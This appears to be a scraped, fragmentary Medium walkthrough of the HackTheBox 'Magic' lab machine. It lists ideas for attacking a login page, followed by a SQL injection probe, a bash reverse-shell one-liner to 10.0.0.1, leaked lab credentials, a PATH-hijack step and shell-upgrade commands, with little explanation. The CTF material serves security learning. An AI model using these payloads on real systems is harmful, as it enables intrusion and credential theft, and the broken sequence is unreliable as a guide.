MAGIC HackTheBox Walkthrough

  1. Bruteforce the password with common usernames like admin,root,guest etc
  2. The login page is vulnerable SQL injections and we could use that to dump the database which could contain credentials of users
  3. The login page could be vulnerable to nosql injection and we could use it to dump user credentials from the database
  4. We could use SQL injection or nosql injection to bypass the login page
  5. It could just be a rabbit hole put there to slow us down and waste our time
  6. We could try dump credentials like admin:admin, guest:guest,admin:password and hope we get lucky
  7. The login credentials have been left somewhere on the box like probably in NFS shares, SMB share or even some random web directory and we need to find it using various methods
admin' ORDER BY 1-- -
bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
theseus:iamkingtheseus
admin:Th3s3usW4sK1ng
/usr/bin
export PATH=/tmp:$PATH
theseus:Th3s3usW4sK1ng
su: must be run from a terminal
1. python3 -c 'import pty;pty.spawn("/bin/bash")'
OR
1. python -c 'import pty;pty.spawn("/bin/bash")'
2.ctrl + z (background the session)3. stty raw -echo;fg
(press enter twice)
4. export TERM=screen (enables clearing screen)

--

--

--

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

@DefiDaveCronos stole 50k cro

Cryptography Introduction

The Greatest Telecommunication Frauds

Whonix, and Tails, and Qubes, Oh my!

Banner displaying the Whonix logo (combination dial lock), Tails logo (USB interface), and Qubes logo (large blue Q).

RansomEXX, Fixing Corrupted Ransom

Oasis Amber Network: Weekly Update (July 20)

$ROG (http://rogin.ai/)Airdrop is Live!

{UPDATE} Horse Racing Pro Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Musyoka Ian

Musyoka Ian

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

More from Medium

Matrix: 1 walkthrough

TryHackMe: Mr Robot CTF

TryHackMe: Blue Writeup

TryHackMe: [Day 13] Networking They Lost The Plan!